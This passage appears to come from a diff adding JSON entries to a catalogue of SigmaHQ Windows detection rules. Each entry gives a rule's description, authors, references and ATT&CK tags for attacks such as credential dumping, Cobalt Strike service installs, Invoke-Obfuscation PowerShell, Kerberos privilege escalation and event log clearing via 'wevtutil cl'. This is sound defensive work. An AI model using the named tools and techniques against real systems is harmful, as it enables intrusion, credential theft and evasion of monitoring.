privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + ], + "filename": "win_security_user_driver_loaded.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User" + }, + { + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_logoff.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags" + }, + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event" + }, + { + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + ], + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "filename": "win_security_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security" + }, + { + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "value": "Microsoft Defender Blocked from Loading Unsigned DLL" + }, + { + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "value": "Unsigned Binary Loaded From Suspicious Location" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_hybridconnectionmgr_svc_running.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "value": "HybridConnectionManager Service Running" + }, + { + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Packages or applications being legitimately used by users or administrators" + ], + "filename": "win_shell_core_susp_packages_installed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "value": "Suspicious Application Installed" + }, + { + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w", + "creation_date": "2021/06/30", + "falsepositive": [ + "Account fallback reasons (after failed login with specific account)" + ], + "filename": "win_susp_failed_guest_logon.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "value": "Suspicious Rejected SMB Guest Logon From IP" + }, + { + "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "meta": { + "author": "Fabian Franz", + "creation_date": "2022/08/30", + "falsepositive": [ + "Legitimate administrative activity", + "Faulty scripts" + ], + "filename": "win_susp_failed_hidden_share_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" + ], + "tags": [ + "attack.t1021.002", + "attack.lateral_movement" + ] + }, + "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", + "value": "Failed Mounting of Hidden Share" + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_application_sysmon_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash" + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_carbonpaper_turla.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_chafer_mar18_system.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System" + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_stonedrill.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ] + }, + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install" + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_turla_service_png.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System" + }, + { + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "filename": "win_system_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_eventlog_cleared.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared" + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "meta": { + "author": "Omer Faruk Celik", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_hack_smbexec.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System" + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "meta": { + "author": "Sittikorn S, Tim Shelton", + "creation_date": "2022/05/11", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_krbrelayup_service_installation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ] + }, + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation" + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_lpe_indicators_tabtip.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/antonioCoco/JuicyPotatoNG", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "value": "Local Privilege Escalation Indicator TabTip" + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "filename": "win_system_lsasrv_ntlmv1.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ] + }, + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "win_system_mal_creddumper.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": 